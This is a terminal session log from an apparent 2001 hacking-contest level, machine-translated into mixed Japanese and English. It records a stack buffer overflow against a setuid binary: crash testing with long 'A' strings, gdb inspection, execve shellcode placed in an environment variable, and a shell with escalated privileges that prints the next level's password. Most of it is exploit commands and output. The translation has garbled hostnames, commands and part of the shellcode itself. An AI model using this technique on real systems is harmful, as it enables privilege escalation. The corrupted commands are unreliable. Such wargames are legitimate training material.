|
このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
Script started on Mon Dec 24 07:37:49 2001
恐れる:0:level3$ telnet 切り開く/タクシー/不正アクセス.datafort.逮捕する
Trying 213.132.58.103...
Connected to 切り開く/タクシー/不正アクセス.datafort.逮捕する.
Escape character is '^]'.
FreeBSD/i386 (badc0ded.datafort.逮捕する) (ttyp2)
login: level3
Password:
Last login: Tue Dec 18 22:30:50 from 61.37.177.27
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All 権利s reserved.
FreeBSD 4.4-RELEASE (GENERIC) #0: Tue Sep 18 11:57:08 PDT 2001
You have mail.
bash-2.05$ cd temp
bash-2.05$ cp /contest/level4 .
bash-2.05$ ./level4
bash-2.05$ ./level4 `perl -e 'print "A" x 4096'`
Segmentation fault (核心 捨てるd)
bash-2.05$ gdb -q ./level4 level4.核心
(no debugging symbols 設立する)...核心 was 生成するd by `level4'.
Program 終結させるd with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...done.
#0 0x280dc67f in getenv () from /usr/lib/libc.so.4
(gdb) x/i $pc
0x280dc67f <getenv+135>: cmpb $0x0,(%ecx)
(gdb) i r ecx
ecx 0x41414141 1094795585
(gdb) やめる
bash-2.05$ ./level4 `perl -e 'print "A" x 1024'`
Segmentation fault (核心 捨てるd)
bash-2.05$ !gdb
gdb -q ./level4 level4.核心
(no debugging symbols 設立する)...核心 was 生成するd by `level4'.
Program 終結させるd with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...
done.
#0 0x280dc67f in getenv () from /usr/lib/libc.so.4
(gdb) やめる
bash-2.05$ ./level4 `perl -e 'print "A" x 512'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbash-2.05$ ./level4 `perl -e 'print "A" x 768'`
Segmentation fault (核心 捨てるd)
bash-2.05$ !gdb
gdb -q ./level4 level4.核心
(no debugging symbols 設立する)...核心 was 生成するd by `level4'.
Program 終結させるd with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...
done.
#0 0x280dc67f in getenv () from /usr/lib/libc.so.4
(gdb) やめる
bash-2.05$ ./level4 `perl -e 'print "A" x 600'`
Segmentation fault (核心 捨てるd)
bash-2.05$ !gdb
gdb -q ./level4 level4.核心
(no debugging symbols 設立する)...核心 was 生成するd by `level4'.
Program 終結させるd with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...
done.
#0 0x41414141 in ?? ()
(gdb) やめる
bash-2.05$ 輸出(する) EGG=`perl -e 'print "\x90" x 128 . "\x31\xc0\x50\x68//sh\x68/貯蔵所\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"'`
bash-2.05$ cat /tmp/getshit.c
main()
{
printf("%x\n",getenv("EGG"));
}
bash-2.05$ gcc -o gs /tmp/getshit.c
bash-2.05$ ./gs
bfbffb27
bash-2.05$ rm -f gs
bash-2.05$ ./level4 `perl -e 'print "A" x 512 . "\x2a\xfb\xbf\xbf" x 8'`
$ id
uid=1003(level3) gid=1003(level3) groups=1003(level3)
$ 出口
bash-2.05$ /contest/level4 `perl -e 'print "A" x 512 . "\x2a\xfb\xbf\xbf" x 8'`
$ id
uid=1003(level3) euid=1004(level4) gid=1003(level3) groups=1003(level3)
$ pass
The password for level4 is hellokitty
$ 出口
bash-2.05$ 出口
関係 の近くにd by foreign host.
恐れる:0:level3$ 出口
Script done on Mon Dec 24 08:03:51 2001